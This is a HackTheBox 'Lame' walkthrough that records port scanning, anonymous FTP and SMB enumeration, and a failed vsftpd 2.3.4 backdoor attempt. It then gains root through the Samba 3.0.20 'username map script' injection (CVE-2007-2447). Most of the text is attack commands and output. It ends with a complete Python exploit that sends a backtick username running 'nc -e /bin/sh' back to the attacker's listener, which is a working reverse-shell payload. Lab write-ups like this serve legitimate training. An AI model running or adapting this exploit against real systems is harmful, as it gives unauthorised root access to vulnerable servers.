Lame (HackTheBox) walkthrough
Anonymous FTP and SMB enumeration, a vsftpd 2.3.4 backdoor attempt that does not pay off, and a root shell through the Samba 3.0.20 username map script command injection (CVE-2007-2447).
# target and attacker addresses (all output below is from 10.129.232.239)
export RHOST=10.129.232.239
export LHOST=10.10.14.113
# full TCP port scan with version detection and default scripts (-sS needs root)
> nmap -sS -sV -sC -p- -oN Lame $RHOST
...
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-07 13:24 BST
Nmap scan report for 10.129.232.239
Host is up (0.0087s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.113
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
|_ 2048 5656240f211ddea72bae61b1243de8f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2024-06-07T08:27:48-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 2h00m38s, deviation: 2h49m45s, median: 36s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.27 seconds
test the anonymous FTP login the scan reported (FTP code 230)
> ncftp -u anonymous $RHOST
...
Connecting to 10.129.232.239...
(vsFTPd 2.3.4)
Logging in...
Login successful.
Logged in to 10.129.232.239.
ncftp / >
# list the FTP root
ncftp / > ls -lha
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
nothing to see…
list the shares with a null session (empty user and password)
> smbclient -L $RHOST -U%
...
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME
check which shares the null session can read or write
> smbmap -H $RHOST
...
[+] IP: 10.129.232.239:445 Name: hackthebox.gr
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
connect anonymously to the tmp share, the only one where the null session has read/write
> smbclient -N //$RHOST/tmp
...
Anonymous login successful
smb: \> ls
...
. D 0 Fri Jun 7 14:18:44 2024
.. DR 0 Sat Oct 31 06:33:58 2020
.ICE-unix DH 0 Fri Jun 7 13:20:42 2024
vmware-root DR 0 Fri Jun 7 13:20:51 2024
.X11-unix DH 0 Fri Jun 7 13:21:09 2024
.X0-lock HR 11 Fri Jun 7 13:21:09 2024
5657.jsvc_up R 0 Fri Jun 7 13:21:54 2024
vgauthsvclog.txt.0 R 1600 Fri Jun 7 13:20:41 2024
7282168 blocks of size 1024. 5385892 blocks available
nothing to see…
Look up public exploits for each identified service version:
> searchsploit vsFTPd 2.3.4
...
--------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
--------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
> searchsploit OpenSSH 4.7p1
...
--------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
OpenSSH < 6.6 SFTP (x64) - Command Execution | linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution | linux/remote/45001.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Es | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
--------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
> searchsploit samba 3.0.20
--------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
--------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
test the vsftpd backdoor exploit manually
# copy the exploit into the working directory
> searchsploit -m unix/remote/49757.py
...
Exploit: vsftpd 2.3.4 - Backdoor Command Execution
URL: https://www.exploit-db.com/exploits/49757
Path: /usr/share/exploitdb/exploits/unix/remote/49757.py
Codes: CVE-2011-2523
Verified: True
File Type: Python script, ASCII text executable
Copied to: /root/49757.py
# run script
> python /root/49757.py $RHOST
...
# ...the script hangs waiting for the backdoor shell
^C [+]Exiting...
switch to metasploit
# search for module
[msf](Jobs:0 Agents:0) >> search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
# load module
[msf](Jobs:0 Agents:0) >> use exploit/unix/ftp/vsftpd_234_backdoor
# print options
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> options
# set rhost
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> set rhost <ip_address>
# set payload
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> set payload cmd/unix/interact
# run payload
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> run
...
[*] 10.129.232.239:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.129.232.239:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
does not look so good: the trigger (a USER containing `:)`) was accepted, but the backdoor shell on TCP/6200 never answered, so the backdoor is not reachable from here
Let's try the Samba "username map script" command injection (CVE-2007-2447) using https://github.com/amriunix/CVE-2007-2447
# clone repo
> git clone https://github.com/amriunix/CVE-2007-2447
# install the dependency (pysmb)
> pip3 install --user pysmb
# start a netcat listener in a different terminal
> nc -lnvp 5555
...
Ncat: Listening on 0.0.0.0:5555
# run script
> python3 ./CVE-2007-2447/usermap_script.py $RHOST 139 $LHOST 5555
# the listener receives the connection
Ncat: Connection from 10.129.232.239.
# in the netcat session, check who we are
> whoami
...
root # (!) the map script is run by smbd as root, so the shell is root
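The script above hides what actually crosses the wire: a single SMB session setup whose username contains backticks, which the vulnerable smb.conf hands to a shell through the "username map script" option. The example below is added here and is not the amriunix script; it builds the same username and delivers it with smbclient's `logon` command instead of pysmb, so it only assumes smbclient on PATH, a listener on LHOST:LPORT, and a target netcat that supports `-e` (which the successful shell above confirms for this box). Default addresses are the lab values from this page.

```python
#!/usr/bin/env python3
"""Samba 3.0.20 'username map script' injection (CVE-2007-2447) via smbclient.

Added example, not the amriunix script used above. The vulnerable smb.conf
passes the SMB username to a shell; backticks inside it therefore run as
root under smbd. This delivers the same username with smbclient's 'logon'
command, so it needs smbclient on PATH and a reverse-shell listener on
LHOST:LPORT (the defaults below are assumptions from the lab session)."""
import shlex
import subprocess
from typing import List


def usermap_payload(lhost: str, lport: int, shell: str = "/bin/sh") -> str:
    """Username that makes the map script execute a reverse shell.

    The '/=' prefix and nohup are the shape the public exploits use; the
    target needs a netcat that supports -e (Lame's does)."""
    return f"/=`nohup nc -e {shell} {lhost} {lport}`"


def smbclient_argv(rhost: str, payload: str, share: str = "tmp", port: int = 139) -> List[str]:
    """argv for a null session to the share that re-authenticates with the payload.

    The injected string is its own argv element, so the attacker box's shell
    never interprets the backticks; only the target's shell does."""
    return [
        "smbclient", f"//{rhost}/{share}",
        "-N",                        # anonymous: the tmp share allows it
        "-p", str(port),
        "-c", f'logon "{payload}"',  # smbclient command that sends a fresh session setup
    ]


def deliver(rhost: str, lhost: str, lport: int, timeout: float = 10.0) -> int:
    """Run smbclient. The logon itself normally fails (NT_STATUS_LOGON_FAILURE),
    which is fine: the map script has already run by then. Returns the exit code,
    or -1 if smbclient did not finish within the timeout."""
    argv = smbclient_argv(rhost, usermap_payload(lhost, lport))
    print("running:", shlex.join(argv))
    try:
        return subprocess.run(argv, timeout=timeout).returncode
    except subprocess.TimeoutExpired:
        return -1


if __name__ == "__main__":
    import sys
    args = sys.argv[1:]
    rhost, lhost, lport = args if len(args) == 3 else ("10.129.232.239", "10.10.14.113", "5555")
    deliver(rhost, lhost, int(lport))
```

Start `nc -lnvp 5555` first, then run `python3 usermap_smbclient.py $RHOST $LHOST 5555`; the shell arrives on the listener exactly as it did with the pysmb script, because the bug is in how smbd builds the shell command, not in any SMB client feature.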
simple in retrospect, as always